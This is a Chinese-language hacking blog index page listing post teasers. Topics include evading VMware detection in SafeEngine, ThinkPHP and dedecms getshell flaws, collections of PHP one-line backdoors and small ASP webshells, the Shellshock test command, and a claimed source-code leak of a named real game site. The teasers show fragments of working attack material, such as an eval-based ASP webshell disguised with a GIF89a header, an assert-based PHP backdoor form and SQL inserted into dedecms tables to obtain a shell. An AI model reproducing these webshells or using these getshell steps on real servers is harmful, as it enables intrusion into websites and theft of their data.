过SafeEngine VMware虚拟机检测
.vmx 文件增加下面三行 disable_acceleration = "TRUE" monitor_control.restrict_backdoor = "TRUE" cpuid.1.ecx = &qu …
过SafeEngine VMware虚拟机检测 阅读完整内容黑客技术
VMware 12虚拟机 安装 macOS S 10.13
1. 我们可以通过下载苹果的破解版操作系统,即传说中的黑苹果系统,可直接安装到电脑上,还有一种方法是通过虚拟机(比如VirtualBox,Virtual Machine)来安装,这样我们即可用原来的操作系统,也可以尝一下苹果的操作系统是什么样的。我 …
VMware 12虚拟机 安装 macOS S 10.13 阅读完整内容ThinkPHP缓存函数设计缺陷导致Getshell漏洞
ThinkPHP是一个开源、快速、兼容而且简单的轻量级国产PHP开发框架,由于ThinkPHP简洁实用、出色的性能和至简的代码,成为国内站长或企业网站使用较多的web框架。 近期,国内安全研究人员发现ThinkPHP在使用缓存的时候,由于缓存函数缺 …
ThinkPHP缓存函数设计缺陷导致Getshell漏洞 阅读完整内容苹果ios9 抓包 两个工具分享
最近需要分析下一些苹果app的数据包,默认是https 也就抓不到真实数据,这里分享两款工具 国人写的工具(推荐):https://github.com/Yonsm/HttPeek 直接下载编译好的文件:点击下载 使用方法: 1.在已越狱的系统中安装 Cydi …
苹果ios9 抓包 两个工具分享 阅读完整内容PHP一句话后门大全
我们以一个学习的心态来对待这些PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。 强悍的PHP一句话后门 这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们 …
PHP一句话后门大全 阅读完整内容SSH bash紧急安全补丁以及修复办法编译打补丁升级bash修复漏洞
漏洞详情页面:http://seclists.org/oss-sec/2014/q3/650 漏洞级别:非常严重 漏洞信息: 1.测试是否存在漏洞,执行以下命令: env t='() { :;}; echo You are vulnerable.’ …
SSH bash紧急安全补丁以及修复办法编译打补丁升级bash修复漏洞 阅读完整内容PHP新型一句话后门
assert也可以直接执行php代码。 现在在本机模拟了下。 建一个post.html <form action = "test.php?page=assert" method = "post">   …
PHP新型一句话后门 阅读完整内容短小精悍asp小马大全
第一款 : GIF89a$ ;<hTml> <%eval request(chr(1))%> <% on error resume next testfile=Requ …
短小精悍asp小马大全 阅读完整内容wanyx.com 爆源码 0DAY
著名单机游戏下载站 wanyx.com 今天偶然发现 直接爆 PHP 源代码 很容易就找到 配置文件,直接用的 root 账户。。。。 懒得提权了。 已经联系站长修复。
wanyx.com 爆源码 0DAY 阅读完整内容dedecms 5.7 Get Webshell ,大家注意安全!
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell 前题条件,必须准备好自己的dede数据库,然后插入数据: 代码: insert into dede_mytag(aid,normbody) values(1,'{ …
dedecms 5.7 Get Webshell ,大家注意安全! 阅读完整内容